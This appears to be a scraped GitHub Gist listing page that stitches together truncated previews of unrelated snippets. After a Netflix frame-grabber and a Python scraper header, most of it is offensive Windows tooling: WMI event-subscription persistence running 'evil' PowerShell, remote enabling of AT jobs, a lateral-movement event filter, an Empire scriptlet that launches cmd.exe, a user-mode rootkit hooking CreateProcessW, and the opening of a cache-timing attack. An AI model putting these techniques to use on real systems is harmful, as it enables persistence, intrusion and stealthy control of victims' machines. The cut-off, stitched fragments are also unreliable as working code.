- February 19, 2016: Initial release.
GitHub Gist doesn't send notifications when people leave a comment, so shoot me an e-mail at [email protected]. I'll gladly fix it. Fuck advertising.
// The player | |
var player = netflix.cadmium.objects.videoPlayer(); | |
// Metadata about current episode -- ID and url to get frame at a specific time | |
var episodeId = netflix.cadmium.metadata.getActiveVideo().episodeId; | |
var imgRoot = netflix.cadmium.metadata.getActiveVideo().progressImageRoot; | |
// Generates URL of preview image for given timestamp | |
function getFrame(timestamp) { | |
var t = Math.floor(timestamp/10000).toString(10); |
GitHub Gist doesn't send notifications when people leave a comment, so shoot me an e-mail at [email protected]. I'll gladly fix it. Fuck advertising.
""" | |
requirements: | |
- requests | |
- unicodecsv | |
- beautifulsoup4 | |
""" | |
import re | |
import functools | |
from collections import namedtuple | |
from collections import defaultdict |
$EventFilterArgs = @{ | |
EventNamespace = 'root/cimv2' | |
Name = 'DriveChanged' | |
Query = 'SELECT * FROM Win32_VolumeChangeEvent' | |
QueryLanguage = 'WQL' | |
} | |
$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs | |
$CommandLineConsumerArgs = @{ |
# Step #1 - Prep payload | |
$Hive = 'HKLM' | |
$PayloadKey = 'SOFTWARE\PayloadKey' | |
$PayloadValue = 'PayloadValue' | |
$TimerName = 'PayloadTrigger' | |
$EventFilterName = 'TimerTrigger' | |
$EventConsumerName = 'ExecuteEvilPowerShell' | |
switch ($Hive) { | |
'HKLM' { $HiveVal = [UInt32] 2147483650 } |
# This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+. | |
$HKLM = [UInt32] 2147483650 | |
# Check to see if EnableAt is set | |
$Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{ | |
hDefKey = $HKLM | |
sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration' | |
sValueName = 'EnableAt' | |
} |
# Define the signature - i.e. __EventFilter | |
$EventFilterArgs = @{ | |
EventNamespace = 'root/cimv2' | |
Name = 'LateralMovementEvent' | |
Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"' | |
QueryLanguage = 'WQL' | |
} | |
$InstanceArgs = @{ | |
Namespace = 'root/subscription' |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="Empire" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
#include <windows.h> | |
#include <stdio.h> | |
FARPROC fpCreateProcessW; | |
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |